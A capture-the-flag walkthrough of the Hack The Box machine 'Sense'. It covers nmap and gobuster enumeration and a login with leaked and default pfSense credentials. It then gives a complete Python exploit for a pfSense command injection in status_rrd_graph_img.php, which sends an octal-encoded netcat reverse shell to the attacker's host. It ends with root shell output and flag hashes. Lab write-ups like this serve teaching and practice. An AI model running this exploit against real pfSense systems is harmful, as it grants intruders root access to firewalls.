Sense

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.60 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Fri Jan  7 12:40:32 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.069s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

# Nmap done at Fri Jan  7 12:40:58 2022 -- 1 IP address (1 host up) scanned in 26.60 seconds

As we see, port 80 (HTTP) and port 443 (HTTPS) are open. Let's try to obtain more information about the services and versions running on those ports. The following command will scan ports 80 and 443 more in depth and save the result into a file:

nmap -sC -sV -p80,443 10.10.10.60 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Fri Jan  7 12:47:19 2022 as: nmap -sCV -p80,443 -oN targeted 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.068s latency).

PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/https?
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan  7 12:47:32 2022 -- 1 IP address (1 host up) scanned in 13.30 seconds

Nmap identifies that port 80 redirects to the port 443. We can also see, that the SSL certificate has no commonName. Let's take a look at the website.

We have a pfSense login page. We could try to brute force the credentials or do an SQL injection, but none of those attacks are going to work. In fact, if you try to brute force the login page, the firewall will ban you. Let's try to list .txt files and directories with gobuster.

gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt -k

dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.
-x file extensions to search for.
-k skips TLS certificate verification.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.60
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt
[+] Timeout:                 10s
===============================================================
2022/01/19 19:43:14 Starting gobuster in directory enumeration mode
===============================================================
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]   
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/changelog.txt        (Status: 200) [Size: 271]                                  
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]   
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]   
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]      
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/] 
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/] 
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]   
/csrf                 (Status: 301) [Size: 0] [--> https://10.10.10.60/csrf/]      
/system-users.txt     (Status: 200) [Size: 106]                                    
/filebrowser          (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]
/%7Echeckout%7E       (Status: 403) [Size: 345]                                     
                                                                                    
===============================================================
2022/01/19 20:16:23 Finished
===============================================================

Exploitation

Gobuster found two interesting .txt files. The /changelog.txt file, which warns that a vulnerability remains to be fixed. And the /system-users.txt, which show us some credentials.

Let's search for the pfSense default credentials on Google. I found the following link, which shows that the default password for the pfSense login page is pfsense. Let's try the user rohit with the password previously found.

And we got in! At this point, I started looking for common exploits on exploit-db.

Exploit-DB is a great database of exploits and proof-of-concepts used by penetration testers and vulnerability researchers.

https://www.exploit-db.com/

And I found a pfSense Command Injection exploit. If you analyze the exploit, you could see that all the exploit is doing is making a GET request to an specific directory, injecting a command in the URL.

I preferred to exploit this vulnerability manually with a python script. All this script does is logging in with the valid credentials, taking the cookies and the CSRF token, and then doing the GET request with the encoded payload. The payload sends a reverse shell to our machine. The script also uses the pwn library which automatically spawn a shell.

from pwn import *
import urllib3
import urllib
import collections
import requests


def def_handler(sig, frame):
    print("\n[!] Quitting...")
    sys.exit(1)

#Ctrl+C
signal.signal(signal.SIGINT, def_handler)

url_login = "https://10.10.10.60/index.php"
payload = ""
command = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 1234 >/tmp/f"

for char in command:
    payload += ("\\" + oct(ord(char)).lstrip("0o"))

url_exploit = "https://10.10.10.60/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"
burp = {'https': 'http://127.0.0.1:8080'} # Proxie

def makeRequest():
    urllib3.disable_warnings()
    s = requests.session()
    s.verify = False

    r = s.post(url_login, proxies=burp)
    
    index = r.text.find('csrfMagicToken')
    csrf_token = r.text[index:index+128].split('"')[-1]

    post_data = {
        "__csrf_magic": csrf_token,
        "usernamefld": "rohit",
        "passwordfld": "pfsense",
        "login": "Login"
    }
    
    login_r = s.post(url_login, data=post_data, proxies=burp)

    exploit_request = s.get(url_exploit, timeout=5)
    
if __name__ == '__main__':

    try:
        threading.Thread(target=makeRequest, args=()).start()
    except Exception as e:
        log.error(str(e))

    shell = listen(1234, timeout=20).wait_for_connection()
    
    shell.interactive()

All you have to do is change the IP address in the payload, and run the exploit with python3.

python3 exploit.py

[+] Trying to bind to :: on port 1234: Done
[+] Waiting for connections on :::1234: Got connection from ::ffff:10.10.10.60 on port 25574
[*] Switching to interactive mode
sh: can't access tty; job control turned off
# $

And finally, as we got the shell as the root user, all we have to do is reap the harvest and take the flags.

# $ whoami
root
# $ cat /home/rohit/user.txt
8721327cc232073b40d27d9c17e7348b
# $ cat /root/root.txt
d08c32a5d4f8c8b10e76eb51a69f1a86

Last updated 2 years ago

Was this helpful?